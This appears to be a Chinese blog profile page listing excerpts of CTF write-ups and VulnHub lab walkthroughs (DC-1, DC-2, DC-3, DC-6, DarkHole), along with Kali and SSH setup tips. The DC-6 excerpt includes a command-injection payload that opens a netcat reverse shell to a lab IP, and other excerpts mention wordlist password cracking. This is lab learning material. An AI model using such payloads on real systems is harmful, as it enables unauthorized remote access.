自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

苏生要努力

努力的苏生

  • 博客(75)
  • 收藏
  • 关注

原创 第九届御网杯网络安全大赛初赛WP

一键解码转字符串得到一串base:ZmxhZ3tHaCQ4TG1QNV5kUTJmTjYmfQ==,然后后面一键解码得到flag:flag{Gh$8LmP5^dQ2fN6&}其和为:4/Π,后面提示说被分成四份,所以猜测完整礼物是Π谐音派,pie,到后面提示凯撒密码,flag{pie},偏移量九得到flag提交。然后把第九栏得到的密文一键解码,得到flag:flagDAUEByV8z{736}4C9。print("flag值为: flag{" + str(flag) + "}")print(f"[!

2025-05-13 10:33:32 892

转载 Vulnhub-DC-6靶机渗透教程

使用kali下的usr/share/wordists/rockyou.txt密码字典进行爆破(这是官网给的提示)//靶机:127.0.0.1 | nc -e /bin/bash 192.168.135.129 4444。使用kali下的usr/share/wordists/rockyou.txt密码字典进行爆破(官网提示)靶机下载:https://www.vulnhub.com/entry/dc-6,315/是一个解压脚本的命令,将脚本修改一下,将/bin/bash写入脚本。

2025-04-29 20:58:33 477

原创 [ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3

直接使用VMware导入打开就行。

2025-04-25 14:42:46 764

原创 VulnHub-DC-2靶机渗透教程

直接使用VMware导入打开就行。

2025-04-24 16:41:43 1003

原创 VulnHub-DarkHole_2靶机渗透教程

直接使用VMware导入打开就行注意:靶机的网络连接模式必须和kali一样,让靶机跟kali处于同一网段,这样kali才能扫出靶机的地址。

2025-04-23 20:36:54 1038

原创 VulnHub-DarkHole_1靶机渗透教程

直接使用VMware打开就行导入成功,打开虚拟机,到此虚拟机部署完成!注意:靶机的网络连接模式必须和kali一样,让靶机跟kali处于同一网段,这用kali才能扫出主机地址。

2025-04-22 22:49:24 688

原创 玄机-流量特征分析-蚁剑流量分析

1.木马的连接密码是多少2.黑客执行的第一个命令是什么3.黑客读取了哪个文件的内容,提交文件绝对路径4.黑客上传了什么文件到服务器,提交文件名5.黑客上传的文件内容是什么6.黑客下载了哪个文件,提交文件绝对路径。

2024-05-27 15:33:13 1816 2

原创 FinalShell 安装 及使用教程

FinalShell 是一款免费的国产的集 SSH 工具、服务器管理、远程桌面加速的良心软件,同时支持 Windows,macOS,Linux,它不单单是一个 SSH 工具,完整的说法应该叫一体化的的服务器,网络管理软件,在很大程度上可以免费替代 XShell,是国产中不多见的良心产品,具有免费海外服务器远程桌面加速,ssh 加速,双边 tcp 加速,内网穿透等特色功能。

2024-04-24 15:44:00 4036

原创 ssh 连接错误 Too many authentication failures 解决方法

如果第一步尝试的秘钥已经超过了服务端的认证尝试次数就会报告Too many authentication failures。百度和谷歌这个错误一般都会让你这么干,但是不推荐这么干,会存在安全隐患 并且有时候服务端不在我们控制之下。需要秘钥认证的时候可以使用参数 ssh -i 你的秘钥 [email protected]。1. 依次尝试 ssh-agent 中的秘钥和配对~/.ssh 的秘钥对。可以使用 ssh-add -D 清除所有缓存的 pem。这个错误的原因是客户端尝试连接次数大于服务端限制的次数。

2024-04-24 15:26:58 4564

原创 如何开启kali的ssh远程连接

如果无法连接,需要先生成两个密钥:ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key。使用远程工具(如xshell)即可连接。将第13行和32改为如下,保存退出。

2024-04-24 15:25:35 582 3

原创 kali安装docker环境教程

如果没有什么问题的话,则说明docker安装成功!

2024-04-19 10:57:49 2122

原创 kali linux 的语言切换为中文

为了解决很多同学看不懂英文的问题,出一个linux语言切换中文的教程。

2024-04-19 10:30:35 2182 1

原创 OWASP top 10

OWASP Top10是每一位渗透测试人员都必须要深入了解和学习的这个列表总结了Web应用程序最可能、最常见、最危险的十大漏洞.

2024-04-18 10:42:06 892

原创 Windows Server 2016虚拟机安装教程

9、磁盘分区与选择Windows安装位置1)选中。

2024-04-14 17:02:00 2663 1

原创 BUUCTF-MISC-[QCTF2018]picture

下载附件发现没有扩展名,用010Editor打开是png图片。获得attachment.txt打开,是python脚本。lsb隐写、DES加解密。发现是DES解密脚本。

2024-03-19 08:41:30 654 1

原创 30余种加密编码类型的密文特征

Base64转换,最好是不要用在加密上,尤其是参数加密,很容易出问题。

2024-03-18 15:41:06 1574

原创 CTF-SHOW-摆烂杯-电子取证

🍬 博主介绍博主介绍:大家好,我是 Mikey ,很高兴认识大家~主攻:【应急响应】 【python】 【数字取证】【单机取证】【流量分析】【MISC】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步作者水平有限,欢迎各位大佬指点,相互学习进步!

2024-03-17 10:02:33 1517

原创 攻防世界-misc-Make-similar

下载得到ogg文件。Olympic CTF 2014原题有提示120 LPM,对应Radiofax。需要将ogg格式文件转换成wav格式音频后,用OS X下的软件。将解密结果保存为文件。这种每行均以小写h开头的密文很类似xxencode,解码后结果中有rfax_man.py字符串。KEY变量即为flag。

2024-03-15 16:59:09 1212 1

原创 DC-1靶场详解

DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/

2024-03-12 11:35:32 3199

原创 攻防世界-misc-arrdeepee

题目:我们某一个box被pwn了。在检查过程中,我们发现了一个叫mimikatz的东西,我们以前没有安装过,所以我们清除了,并且重新安装了box。但是安装太麻烦了,除了需要解决openssl 1.0.2和1.1.0+的兼容性问题,还涉及到cmake安装时ffmpeg等各种库的版本问题,回头下载一个2016.2版本的Kali试试看能否正常安装。然后过滤tls协议,可以看到解密后的流量中出现了RDP和TPKT协议。需要输入密码,题目里给出了一个目前没有用到的信息mimikatz,尝试作为密码,成功提取出密钥。

2024-03-11 15:27:20 1571

原创 misc49

听说水印很强大,我来康康!key{welcome_to_ctf}得到flag:flag{y0u_are_we1l}下载附件是个txt文件,打开发现是个压缩包的头。使用密码解压压缩包得到图片,然后盲水印。base解码无果,我们尝试字母解码。后缀改成zip后打开。

2024-03-10 15:17:56 506 1

原创 stega11

010查看图片发现一串base。

2024-03-10 15:09:12 477

原创 红包题第一弹

现每个压缩包里面都有图片,010打开图片末尾都有base64部分,并且每个压缩包里面图片末尾的base64长度一样,刚好每一张的base64长度为100。猜测需要拼接起来然后解码。下载附件,发现有86个压缩包。输出结果解码得到二维码。写个python脚本。

2024-03-10 15:05:28 484

原创 misc40

开 一张普通的二维码.png,直接扫不出结果。010查看图片尾部发现 Brainfuck 编码。下载附件,发现只有第三个wav文件需要密码,其他都可以看。和谐民主和谐文明和谐和谐和谐自由和谐平等和谐公正。社会主义核心价值观解码得到:123456。对了~另一个音乐的密码是abc123哦。打开 conversion.txt。我们需要使用静默之眼打开wav文件。二进制转十进制得到202013。然后使用此密码进行mp3解码。使用此密码解压wav。

2024-03-10 15:02:27 508

原创 stega1

无密码型jphs隐写得到flag。下载附件打开是一张jpg照片。

2024-03-10 14:57:40 460

原创 misc30

扫码得到flag flag{welcome_to_ctfshow}使用此密码(Hello friend!)解压图片,得到一个二维码。发现只有中间的图片可以分析,另外两个都有密码。使用该密码可以解压doc文本,发现doc隐写。那就先分析星空,属性里面发现。

2024-03-10 14:55:14 433

原创 CTF.show-MISC

用010编辑器打开,发现图片中隐写了其他图片,手动或者binwalk或者foremost分离出图片。flag为ctfshow{6f66202f21ad22a2a19520cdd3f69e7b}flag为ctfshow{d5e937aefb091d38e70d927b80e1e2ea}和上一题一样,不过把flag藏到了中间,用notepad打开,ctrl+f搜索得到的。010(winhex,hxd)打开,搜ctfshow找到flag。winhex打开,在尾部看到flag。打开第一个文件得到flag。

2024-03-10 14:42:14 914

原创 CTF.show-MISC-misc50

但是解压需要密码,我们foremost分离出来的还有个图片,010查看末尾发现。得到flag:flag{Welc0me_tO_cTf_3how!base64解码得到密码123456(用于解压下一个压缩包)得到。base64+32解码得到KEY{Lazy_Man}使用kali中binwalk查看,发现有隐藏文件。把解出来的结果导入到编辑器中保存,发现是7Z头。发现base64 base32解码发现不行。后来发现是个base64+32循环解码。使用脚本解码,也可以使用在线网站解码。下载附件得到了一张照片。

2024-03-10 14:14:29 692 1

原创 CTF.show-misc30

使用在线音符解密得到:U2FsdGVkX1/eK2855m8HM4cTq8Fquqtm6QDbcUu4F1yQpA==解出的值hello 2020!作为密码打开加密的文件得到flag。打开misc.png,看见图片中有2020,猜测密码是2020。base64嵌套,base64 6次解码得到key。使用这个得到的字符串当作密码,解压之前加密的文件。flag为flag{g00d_f0r_y0u}下载文件后,只有misc1.zip可解压。试试base解码试试,尝试下发现不是。输入密码解压出 misc.doc。

2024-03-10 13:59:25 646

原创 2023年全国职业院校技能大赛信息安全管理与评估

( )20、假设系统中有n个用户,他们使用对称加密体制实现保密通信,那么系统中共需要管理( n(n-1)/2)个密钥,每个用户需要保存( ) 个密钥。35、在常见的安全扫描工具中,以下( ) 主要用来分析Web站点的漏洞,可以针对数千种常见的网页漏洞或安全风险进行检测。26、维吉利亚(Vigenere)密码是古典密码体制比较有代表性的一种密码,其密码体制采用的是( )。25、现今非常流行的SQL(数据库语言)注入攻击属于下列哪一项漏洞的利用?

2024-03-10 11:25:48 1282

原创 攻防世界-MISC-EASY_EVM

查了一下WP,Bytecode 被修改过使其无法反编译,需要修复或者直接看opcode。这是一个以太坊智能合约(EVM)虚拟机的 Bytecode,那么考察的就是EVM逆向。运行后得到flag:flag{An_E4sy_EVM_y0u_sO1ve_it!那么这实际上是一个求解同余方程组的数论问题。

2024-03-09 11:46:59 1581

原创 BUUCTF-MISC-[HDCTF2019]信号分析1

百度得知:PT2242信号:前面4bit表示同步码,中间的20bit表示地址码,后面的4bit表示功能码,最后一位是停止码。下载附件是一个WAV的文件,题目又叫做信号分析,用Adobe Audition 打开分析了。01 代表 F,00 代表 0,11 代表 1,最后的0是结束符。发现有很多长短不一样的信号,只需要分析一段。得到最后flag:FFFFFFFF0001。猜测长的是一短的为0。

2024-03-08 15:24:51 654

原创 BUUCTF-MISC-[DDCTF2018]第四扩展FS1

BUUCTF中没有给什么提示,找到之前ctf根据提示可能是字频分析。运行脚本后得到flag:DCTF{huanwe1sik4o!当然使用在线的也可以,只是我忘了哪个网址叫什么,可以搜一下。使用kali下的binwalk分离获得一个压缩包。查看照片属性,得到密码Pactera。写个python脚本统计下字频。下载附件打开是一张jpg照片。打开压缩包发现需要密码。

2024-03-08 10:18:46 573

原创 2023第二届陇剑杯网络安全大赛 SS Writeup

打开流量包文件过滤http流量从这个开始追踪TCP流直接百度搜索payload搜索得到这题flag就是CVE-2022-22965。

2024-03-07 19:55:35 1215

原创 某省内存取证真题详解

需要环境的私我题目描述:一,从内存中获取到用户admin的密码并且破解密码,以Flag{admin,password}形式提交(密码为6位)二,获取当前系统ip地址及主机名,以Flag{ip:主机名}形式提交;三,当前系统中存在的挖矿进程,请获取指向的矿池地址,以Flag{ip}形式提交四,恶意进程在系统中注册了服务,请将服务名以Flag{服务名}形式提交五,从内存文件中获取黑客进入系统后下载的flag文件,将文件中的值作为Flag值提交。

2024-03-07 19:12:51 1287

原创 BUUCTF-MISC-[湖南省赛2019]Findme1

flag为flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea}这是个动图,需要使用一个工具分解,APNG图片分解器。下载附件是一个apng的文件,可以使用火狐打开。其他的照片在steghide中调色就能扫出来。有几张照片的二维码是被扭曲了。最后合起来就得到了flag。

2024-03-06 09:31:52 511 3

原创 BUUCTF-MISC-[GUET-CTF2019]soul sipse1

steghide extract -sf /root/桌面/out.wav。使用010编辑器打开,发现文件头错误,修改成89 50 4E 47。尝试这两个flag,发现都不对,最后发现flag是他们两个相加。修改成功后打开,发现一串字符,像unide编码,使用工具解码。下载附件是一个音频文件,使用au打开没有什么发现。下载后使用binwalk查看照片是否有隐藏文件。最终flag为:flag{5304}试试kali中的steghide。看看属性里面有没有信息。

2024-03-06 09:18:16 542

原创 BUUCTF-MISC-[SCTF2019]电单车1

下载附件,是一个音频文件,拖入看看考的知识点是PT2242信号 有长有短,短的为0,长的为1化出来。

2024-03-06 08:54:51 649

原创 BUUCTF-Misc-粽子的来历1

最后得到flag{d473ee3def34bd022f8e5233036b3345}发现每行的字间距不相同,把大间距设为1小间距设为0试试。100100100001,flag为。下载附件给了四个doc文件。将乱码全部改成yy打开。

2024-03-05 21:27:19 647

原创 BUUCTF-Misc-zippy

下载附件打开数据包追踪流,发现一个压缩包密码supercomplexpassword。flag为flag{this_flag_is_your_flag}将数据包放进kali中binwalk提取压缩包。使用获得的密码打开压缩包获得flag。

2024-03-05 19:36:35 546

流量分析例题目(包含原题).md

A集团的网络安全监控系统发现恶意份子正在实施高级可持续攻击(APT),并抓取了部分可疑流量包。请您根据捕捉到的流量包,搜寻出网络攻击线索,分解出隐藏的恶意程序,并分析恶意程序的行为。任务素材清单:捕获的网络数据包文件。

2024-02-20

学生成绩数据.sav

学生成绩数据.sav

2023-04-11

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除